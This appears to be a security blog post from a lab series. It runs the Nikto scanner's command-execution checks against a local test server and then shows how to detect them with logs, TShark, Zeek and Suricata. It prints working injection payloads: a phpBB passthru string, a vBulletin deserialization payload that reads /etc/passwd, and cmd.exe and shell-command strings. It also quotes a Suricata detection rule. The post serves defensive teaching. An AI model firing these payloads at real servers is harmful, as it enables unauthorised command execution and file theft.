This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection.
From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.
The Hack - Beginning Nikto - Command Execution / Remote Shell
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6] └─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 8 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 10.0.0.106 + Target Hostname: 10.0.0.106 + Target Port: 80 + Start Time: 2023-06-07 15:54:20 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 + /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + /: Retrieved x-powered-by header: PHP/8.0.28. + OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023. + PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch. + /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing + /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm. + ... + /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm. + /?-s - Redirects (302) to http://10.0.0.106/dashboard/ , PHP allows retrieval of the source code via the -s parameter, and may allow command execution. + 1074 requests: 0 error(s) and 6 item(s) reported on remote host + End Time: 2023-06-07 15:54:22 (GMT-4) (2 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Looking at above, one may immediately draw the conclusion that this site is vulnerable. However, we know from our previous posts, the parameters referenced by "index.php" such as name, does not exist on this page.
See here for more on attacking Command Injection:
Learning by practicing: Beginning Web Application Testing: OS Command Injection - DVWA (securitynik.com)
Learning by practicing: Beginning Web Application Testing: OS Command Injection - DVWA (securitynik.com)
Detect - Log Analysis
Jumping straight to the decoding of the URLs. Take a look at the first 7 lines with parameters that needs decoding.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6] └─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | head --lines=7 %0acat%0a/etc/passwd%0a aaaaaaaa action=load&whois=%3Bid action=modify_user APP=qmh-news&TEMPLATE=;ls%20/etc| arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
Decoding above and others via urldecode.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6] └─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }' ... aaaaaaaa action=load action=modify_user alert-debug.log arguments=O:12:"vB_dB_Result":2:{s:5:" /bin/cat /etc/passwd cat cat /etc/hosts cat /etc/passwd cat /etc/passwd /c dir /c dir c:\ /c dir c:\" /c dir /OG cli=aa aa'cat /etc/hosts cmd=cat /etc/passwd cmd=dir c:\\ command=savesetup conn.log /c ver data=Download dns.log email=x /etc/passwd _MAILTO=xx message=test\ name=forums name=Forums name=Network_Tools name=PNphpBB2 Nikto=forums Nikto=Forums pass= process QALIAS=x Qname=root QNikto=root query=AAA realname=aaa realNikto=aaa reporter.log -s sd=ls /etc server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF type=Library -v WSDL xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&
We already know most of those parameters are non-existent. Additionally, the host running this webserver is Windows based on not Linux.
See here for more on detecting command injection via logs.
Learning by practicing: Beginning Web Application Testing: Detecting OS Command Injection - DVWA (securitynik.com)
Learning by practicing: Beginning Web Application Testing: Detecting OS Command Injection - DVWA (securitynik.com)
Detect - Packet Analysis
Setup for packet analysis. Capture packets on ports 80,443
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6] └─$tshark -n -w tuning_1.pcap -f 'tcp port(80 or 443)' --interface eth0
Decoding the URLs from the packet data.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6] └─$ tshark -n -r tuning_8.pcap -Y 'http.request.method == "GET"' -T fields -e http.request.uri | grep --perl-regexp '\?.*' --only-matching | \
grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | \
awk --field-separator='HTTP' '{ print $1 }' | sort --unique | \
awk --field-separator=' ' '{ system("urlencode -d "$1) }' cat /etc/passwd aaaaaaaa action=load action=modify_user cat /etc/passwd cat /etc/hosts /c dir /c dir c:" /c dir c:\ /c dir /OG cli=aa aa'cat /etc/hosts cmd=cat /etc/passwd cmd=dir c:\ command=savesetup /c ver data=Download ... name=forums name=Forums name=forums name=Network_Tools name=Forums name=PNphpBB2 name=PNphpBB2 Nikto=forums Nikto=Forums Nikto=forums Nikto=Forums pass= QALIAS=x /bin/cat /etc/passwd Qname=root cat /etc/passwd QNikto=root cat /etc/passwd query=AAA realNikto=aaa -s sd=ls /etc realname=aaa server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF t=2 t=2 type=Library type=Library WSDL xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&
Not much more to do here. Transitioning to Zeek
Detect - Zeek Analysis
Setup Zeek
Analyzing http.log file.
Setup Zeek
┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff] └─$ sudo zeek --iface any --no-checksums
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6] └─$ cat http.log | grep --perl-regexp "\s+\/.*?\s+" --only-matching | \
grep --perl-regexp '\?.*' --only-matching | grep --invert-match "phpinfo" | \
cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | \
sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }' aaaaaaaa uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),121(bluetooth),133(scanner),141(vboxsf),142(kaboxer),147(docker) action=load action=modify_user ... sd=ls server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF sh: 1: Syntax error: "(" unexpected t=2 type=Library type=Library user=cpanel user_id=1 -v WSDL x0acatx0a/etc/passwdx0a
The above information is the same that was seen in the log and packet analysis sections. Difference being it was extracted from the http.log file of Zeek.
Detect - Suricata (IDS) Analysis
Setup Suricata to operate in IDS mode
┌──(kali㉿securitynik)-[/var/log/suricata] └─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all
Wrap this up with suricata.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6] └─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5 45 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 23 1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt 22 1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt 14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315 12 1:2100982:12] GPL EXPLOIT unicode directory traversal attempt
The one that we will extract here is the 23 "1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt "
What is the rule looking for?
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6] └─$ grep "2009361" /var/lib/suricata/rules/suricata.rules | fmt alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt"; flow:to_server,established; http.uri; content:"/cmd.exe"; nocase; reference:url,doc.emergingthreats.net/2009361; classtype:attempted-recon; sid:2009361; rev:8; metadata:created_at 2010_07_30, updated_at 2020_09_14;)
Rule is looking to ensure the 3-way handshake is completed and that the traffic is going to the server. The server in this case, is the device that sent the SYN-ACK as part of establishing the session during the three-way handshake. It is also looking for the content "/cmd.exe" in the URI. Let's find that packet, where "/cmd.exe" is in the URI.
ALERT CNT: 1 ALERT MSG [00]: ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt ALERT GID [00]: 1 ALERT SID [00]: 2009361 ALERT REV [00]: 8 ALERT CLASS [00]: Attempted Information Leak ALERT PRIO [00]: 2 ALERT FOUND IN [00]: STATE ALERT IN TX [00]: 49 PAYLOAD LEN: 211 PAYLOAD: 0000 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 63 6D 64 GET /cgi -bin/cmd 0010 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 .exe?/c+ dir HTTP 0020 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 30 2E 30 /1.1..Ho st: 10.0 0030 2E 30 2E 31 30 36 0D 0A 43 6F 6E 6E 65 63 74 69 .0.106.. Connecti 0040 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A on: Keep -Alive.. 0050 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Age nt: Mozi 0060 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 lla/5.0 (Windows 0070 20 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B NT 10.0 ; Win64; 0080 20 78 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 x64) Ap pleWebKi 0090 74 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C t/537.36 (KHTML, 00A0 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 like Ge cko) Chr 00B0 6F 6D 65 2F 37 34 2E 30 2E 33 37 32 39 2E 31 36 ome/74.0 .3729.16 00C0 39 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 9 Safari /537.36. 00D0 0A 0D 0A
Nothing meaningful left here to review.
Hope you enjoyed the posts in this series:
No comments:
Post a Comment